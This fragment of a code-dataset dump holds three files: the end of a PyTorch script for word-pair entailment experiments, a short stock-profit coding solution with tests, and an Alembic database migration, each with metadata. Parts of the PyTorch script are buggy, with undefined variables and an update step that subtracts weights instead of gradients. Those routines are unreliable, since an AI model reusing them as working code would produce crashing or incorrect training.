self.learning_rate * self.classifierMatrices.grad\n self.classifierMatrix.data -= self.learning_rate * self.classifierMatrix.grad\n self.classifierBias.data -= self.learning_rate * self.classifierBias.grad\n self.Dense.data -= self.learning_rate * self.Dense.grad\n self.DenseBias.data -= self.learning_rate * self.DenseBias.grad\n # Manually zero the gradients after running the backward pass\n self.Vocab.grad.zero_()\n self.matrices.grad.zero_()\n self.matrix.grad.zero_()\n self.bias.grad.zero_()\n self.classifierMatrices.grad.zero_()\n self.classifierMatrix.grad.zero_()\n self.classifierBias.grad.zero_()\n self.Dense.grad.zero_()\n self.DenseBias.grad.zero_()\n '''\n\n def get_regularizations(self):\n l2_reg = Variable( torch.FloatTensor(1), requires_grad=True)\n for W in self.trainable:\n l2_reg = l2_reg + W.norm(2)\n return l2_reg*self.lamb\n\n\nclass Experiment:\n def __init__(self, DIM=16, PENULT=45, learning_rate=.2, lamb = .0002, filename='../bowman_vector-entailment-ICLR14-R1/wordpairs-v2.tsv'):\n data_file = filename\n self.wordMap, self.relationMap, self.relations = loadTrainingData(data_file)\n print('Loading data')\n self.data = loadData(None, None, None, self.wordMap, self.relationMap)\n print('Data loaded!')\n self.net = Net(self.wordMap, self.relations, DIM=DIM, PENULT=PENULT, lamb=lamb, learning_rate=learning_rate)\n print(self.net)\n\n def balance(self):\n for d in self.data:\n for line in d:\n if line['relation'] not in r:\n r[line['relation']] = 0\n r[line['relation']] += 1\n for key in r:\n print(key, r[key])\n\n def run(self, train_split=.9, batch_size = 32, epochs = 5, discount=.75):\n #optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\n print(self.net.DIM, self.net.PENULT, self.net.learning_rate, self.net.lamb, train_split, batch_size, epochs)\n success_rate = []\n training = []\n testing = []\n percentage = train_split\n for d in self.data:\n file_data = []\n for line in d:\n file_data.append(line)\n training.extend(file_data[:int(percentage*len(file_data))])\n testing.extend(file_data[int(percentage*len(file_data)):])\n\n random.shuffle(training)\n random.shuffle(testing)\n print('Training Length',len(training))\n print('Testing Length',len(testing))\n loss = 0\n train_num = 0\n\n for epoch in tqdm.tqdm(range(epochs)): # loop over the dataset multiple times\n total_loss = 0\n print('Beginning Epoch number',epoch)\n successes = 0\n total = 0\n y_true = []\n y_pred = []\n for line in training:\n train_num += 1\n left_tree = line['left_tree']\n right_tree = line['right_tree']\n relation = line['relation']\n \n true_out = self.relationMap[relation]\n\n outputs = self.net(left_tree, right_tree)\n #print(outputs)\n #print(torch.argmax(outputs), torch.tensor(true_out))\n if torch.tensor(true_out) == torch.argmax(outputs):\n successes += 1\n y_true.append(true_out)\n y_pred.append(torch.argmax(outputs).item())\n total+=1\n\n loss += -torch.log(outputs[true_out])\n #import pdb; pdb.set_trace()\n #print(outputs, loss)\n if train_num % batch_size == 0:\n #import pdb; pdb.set_trace()\n loss += self.net.get_regularizations()[0]\n total_loss += loss.item()\n loss.backward()\n self.net.update_params()\n loss = 0\n #print( torch.argmax(outputs))\n print(confusion_matrix(y_true,y_pred))\n self.net.learning_rate *= discount\n print('Total Loss:',total_loss)\n print('Training Accuracy:',successes/total, successes)\n successes = 0\n total = 0\n y_true = []\n y_pred = []\n for line in testing:\n left_tree = line['left_tree']\n right_tree = line['right_tree']\n relation = line['relation']\n \n true_out = self.relationMap[relation]\n\n outputs = self.net(left_tree, right_tree)\n #print(outputs)\n if torch.tensor(true_out) == torch.argmax(outputs):\n successes += 1\n y_true.append(true_out)\n y_pred.append(torch.argmax(outputs).item())\n total += 1\n print(confusion_matrix(y_true,y_pred))\n print('Testing Accuracy:',successes/total, successes)\n\nclass FFNN(nn.Module):\n def __init__(self, DIM, relationMap, learning_rate=.2):\n super(FFNN, self).__init__()\n self.DIM = DIM\n self.relationMap = relationMap\n self.middle = 40\n self.num_relations = len([key for key in relationMap])\n self.learning_rate = learning_rate\n dtype = torch.FloatTensor\n self.Dense = Variable(torch.rand(2*(DIM+DIM+self.num_relations), self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseOut = Variable(torch.rand(self.middle, 1).type(dtype)*.02-.01, requires_grad=True)\n self.BiasOut = Variable(torch.rand(1).type(dtype)*.02-.01, requires_grad=True)\n self.trainable = [self.Dense, self.DenseBias, self.DenseOut, self.BiasOut]\n\n def forward(self, left_vec, right_vec):\n #import pdb; pdb.set_trace()\n left_tensor = torch.from_numpy(left_vec.reshape(-1, len(left_vec)))\n right_tensor = torch.from_numpy(right_vec.reshape(-1, len(right_vec)))\n left_tensor = left_tensor.type(torch.FloatTensor)\n right_tensor = right_tensor.type(torch.FloatTensor)\n inp = torch.cat((left_mid, right_mid), dim=1)\n mid = torch.mm(inp, self.Dense) + self.DenseBias\n out = torch.mm(mid, self.DenseOut) + self.BiasOut\n return out\n\n def update_params(self):\n for el in self.trainable:\n el.data -= self.learning_rate * el.data\n el.grad.zero_()\n\nclass FFCNN(nn.Module):\n def __init__(self, DIM, relationMap, learning_rate=.2):\n super(FFCNN, self).__init__()\n self.DIM = DIM\n self.relationMap = relationMap\n self.middle = 20\n self.num_relations = len([key for key in relationMap])\n self.learning_rate = learning_rate\n dtype = torch.FloatTensor\n self.DenseLeft = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseRight = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseLeftBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseRightBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseOut = Variable(torch.rand(self.middle*2, 1).type(dtype)*.02-.01, requires_grad=True)\n self.BiasOut = Variable(torch.rand(1).type(dtype)*.02-.01, requires_grad=True)\n self.trainable = [self.DenseLeft, self.DenseRight, self.DenseLeftBias, self.DenseRightBias, self.DenseOut, self.BiasOut]\n\n def forward(self, left_vec, right_vec):\n #import pdb; pdb.set_trace()\n left_tensor = torch.from_numpy(left_vec.reshape(-1, len(left_vec)))\n right_tensor = torch.from_numpy(right_vec.reshape(-1, len(right_vec)))\n left_tensor = left_tensor.type(torch.FloatTensor)\n right_tensor = right_tensor.type(torch.FloatTensor)\n left_mid = torch.mm(left_tensor, self.DenseLeft) + self.DenseLeftBias\n right_mid = torch.mm(right_tensor, self.DenseRight) + self.DenseRightBias\n mid = torch.cat((left_mid, right_mid), dim=1)\n out = torch.mm(mid, self.DenseOut) + self.BiasOut\n return out\n\n def update_params(self):\n for el in self.trainable:\n el.data -= self.learning_rate * el.data\n el.grad.zero_()\n\nclass COMPNN(nn.Module):\n def __init__(self, DIM, relationMap, learning_rate=.2):\n super(COMPNN, self).__init__()\n self.DIM = DIM\n self.relationMap = relationMap\n self.middle = 20\n self.num_relations = len([key for key in relationMap])\n self.learning_rate = learning_rate\n dtype = torch.FloatTensor\n self.matrices = Variable(torch.rand(DIM, DIM, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.matrix = Variable(torch.rand(DIM*2, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.bias = Variable(torch.rand(1, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.DenseLeft = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseRight = Variable(torch.rand(DIM+DIM+self.num_relations, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseLeftBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseRightBias = Variable(torch.rand(1, self.middle).type(dtype)*.02-.01, requires_grad=True)\n self.DenseOut = Variable(torch.rand(self.middle*2, 1).type(dtype)*.02-.01, requires_grad=True)\n self.BiasOut = Variable(torch.rand(1).type(dtype)*.02-.01, requires_grad=True)\n self.trainable = [self.DenseLeft, self.DenseRight, self.DenseLeftBias, self.DenseRightBias, self.DenseOut, self.BiasOut]\n\n def combine_vals(self, l_val, r_val):\n intermediate = torch.squeeze(torch.matmul(l_val, self.matrices))\n t_r_val = torch.t(r_val)\n tensor_out = torch.t(torch.mm(intermediate, t_r_val))\n\n concated = torch.cat((l_val, r_val), dim=1)\n additive = torch.mm( concated ,self.matrix)\n\n tensor_out += additive\n tensor_out += self.bias\n return self.tanh(tensor_out)\n\n def forward(self, left_vec, right_vec):\n #import pdb; pdb.set_trace()\n left_tensor = torch.from_numpy(left_vec.reshape(-1, len(left_vec)))\n right_tensor = torch.from_numpy(right_vec.reshape(-1, len(right_vec)))\n left_tensor = left_tensor.type(torch.FloatTensor)\n right_tensor = right_tensor.type(torch.FloatTensor)\n left_mid = torch.mm(left_tensor, self.DenseLeft) + self.DenseLeftBias\n right_mid = torch.mm(right_tensor, self.DenseRight) + self.DenseRightBias\n mid = torch.cat((left_mid, right_mid), dim=1)\n out = torch.mm(mid, self.DenseOut) + self.BiasOut\n return out\n\n def update_params(self):\n for el in self.trainable:\n el.data -= self.learning_rate * el.data\n el.grad.zero_()\n\nclass PartTwo:\n def __init__(self, data, net, relationMap):\n self.data = data\n self.net = net\n self.relationMap = relationMap\n self.netTwo = FFCNN(self.net.DIM, relationMap)\n\n def convert_tree(self, lt, rt, relation):\n lt_val, rt_val = self.net.get_vals(lt, rt)\n true_out = self.relationMap[relation]\n one_hot = [0 for el in [key for key in self.relationMap.keys()] ]\n one_hot[true_out] = 1\n return np.concatenate([lt_val.data.numpy()[0], rt_val.data.numpy()[0], np.array(one_hot)])\n\n def get_dataset_data(self):\n print('Converting dataset')\n support_dict = {}\n for d in self.data:\n for line in d:\n for el in (neededRelations(None, line)):\n t = (el[0].text, el[1].text, el[2])\n support_dict[t] = el\n\n support_list = list([key for key in support_dict.keys()])\n dataset = []\n self.converted_dataset = []\n for d in self.data:\n for line in d:\n line_support_set = neededRelations(None, line)\n line_support_hash = set([(el[0].text, el[1].text, el[2]) for el in line_support_set])\n false_examples = []\n while len(false_examples) != len(line_support_set):\n false_example_guess = random.sample(support_list, len(line_support_set)*2)\n for el in false_example_guess:\n if el not in line_support_hash:\n false_examples.append(support_dict[el])\n if len(false_examples) == len(line_support_set):\n break\n for el in line_support_set:\n dataset.append((line, {'left_tree':el[0], 'right_tree':el[1], 'relation':el[2]}, True))\n conv_line = self.convert_tree(line['left_tree'], line['right_tree'], line['relation'])\n conv_el = self.convert_tree(el[0], el[1], el[2])\n self.converted_dataset.append((conv_line, conv_el, 1))\n for el in false_examples:\n dataset.append((line, {'left_tree':el[0], 'right_tree':el[1], 'relation':el[2]}, False))\n conv_line = self.convert_tree(line['left_tree'], line['right_tree'], line['relation'])\n conv_el = self.convert_tree(el[0], el[1], el[2])\n self.converted_dataset.append((conv_line, conv_el, 0))\n print('Finished Converting!')\n\n def run(self, epochs = 5):\n self.get_dataset_data()\n random.shuffle(self.converted_dataset)\n training = self.converted_dataset[:int(.8*len(self.converted_dataset))]\n testing = self.converted_dataset[int(.8*len(self.converted_dataset)):]\n for epoch in range(epochs):\n total_loss = 0\n correct = 0\n total = 0\n for el in training:\n output = self.netTwo(el[0], el[1])\n correct += round(output.item())==el[2]\n total += 1\n true = torch.tensor(el[2])\n true = true.type(torch.FloatTensor)\n loss = -torch.log(torch.abs(true-output))[0][0]\n total_loss += loss\n loss.backward()\n self.netTwo.update_params()\n print(\"Epoch\",epoch,\"loss:\",total_loss/len(self.converted_dataset))\n print(\"Correct:\",correct/total)\n correct = 0\n total = 0\n for el in testing:\n output = self.netTwo(el[0], el[1])\n correct += round(output.item())==el[2]\n total += 1\n print(\"Test Correct:\",correct/total)\n\nprint('Learning Rate Experiments')\nprint('\\nExperiment 1\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.2, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 0, discount=.75)\np2 = PartTwo(e.data, e.net, e.relationMap)\np2.run()\n\n\n'''\nprint('\\nExperiment 2\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.1, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 3\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.05, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 4\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.01, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 5\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.4, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 6\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.3, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 7\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.005, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\nprint('\\nExperiment 8\\n','*'*100)\ne = Experiment(DIM=15, PENULT=45, learning_rate=.001, lamb = .0002)\ne.run(train_split=.9, batch_size = 32, epochs = 5)\n\n\n\n'''\n\n\n\n\n\n\n", "sub_path": "misc/FullTorch.py", "file_name": "FullTorch.py", "file_ext": "py", "file_size_in_byte": 20653, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 130, "usage_type": "call"}, {"api_name": "LoadTrainingData.loadTrainingData", "line_number": 139, "usage_type": "call"}, {"api_name": "load_data.loadData", "line_number": 141, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 169, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 170, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 211, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 231, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 236, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 244, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 255, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 256, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 267, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 267, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 275, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 287, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 288, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 289, "usage_type": "attribute"}, {"api_name": "torch.mm", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 301, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 301, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 309, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 310, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 310, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 311, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 311, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 314, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 314, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 323, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 324, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 324, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 326, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 335, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 336, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.mm", "line_number": 339, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 340, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 341, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "neededRelations.neededRelations", "line_number": 369, "usage_type": "call"}, {"api_name": "neededRelations.neededRelations", "line_number": 378, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 382, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 414, "usage_type": "attribute"}, {"api_name": "torch.log", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 415, "usage_type": "call"}]} +{"seq_id": "297308686", "text": "from typing import List\n\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n profit = 0\n for i in range(1, len(prices)):\n if prices[i] > prices[i-1]:\n profit += prices[i] - prices[i-1]\n\n return profit\n\n\nif __name__ == '__main__':\n sol = Solution()\n assert sol.maxProfit([7,1,5,3,6,4]) == 7, \"wrong\"\n assert sol.maxProfit([1,2,3,4,5]) == 4, \"wrong\"", "sub_path": "easy/Best_Time_to_Buy_and_Sell_Stock_II.py", "file_name": "Best_Time_to_Buy_and_Sell_Stock_II.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "521050168", "text": "\"\"\"orders\n\nRevision ID: 276ff79ed610\nRevises: 839020a2f1db\nCreate Date: 2020-07-12 11:30:34.076689\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '276ff79ed610'\ndown_revision = '839020a2f1db'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('orders', sa.Column('coupon', sa.String(length=20), nullable=True))\n op.alter_column('orders', 'paymentMethod',\n existing_type=mysql.VARCHAR(length=20),\n nullable=True)\n op.alter_column('orders', 'paymentStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=True)\n op.alter_column('orders', 'thunderserviceStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=True)\n op.add_column('thunderservice', sa.Column('duration', sa.Integer(), nullable=True))\n op.add_column('thunderservice', sa.Column('onSalePrice', sa.Float(), nullable=True))\n op.add_column('thunderservice', sa.Column('promotion', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('thunderservice', 'promotion')\n op.drop_column('thunderservice', 'onSalePrice')\n op.drop_column('thunderservice', 'duration')\n op.alter_column('orders', 'thunderserviceStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=False)\n op.alter_column('orders', 'paymentStatus',\n existing_type=mysql.VARCHAR(length=20),\n nullable=False)\n op.alter_column('orders', 'paymentMethod',\n existing_type=mysql.VARCHAR(length=20),\n nullable=False)\n op.drop_column('orders', 'coupon')\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/276ff79ed610_orders.py", "file_name": "276ff79ed610_orders.py", "file_ext": "py", "file_size_in_byte": 1916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.alter_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 26, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Float", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 41, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 41, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 42, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 42, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 43, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 45, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 45, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 48, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 48, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 49, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 51, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 51, "usage_type": "name"}]} 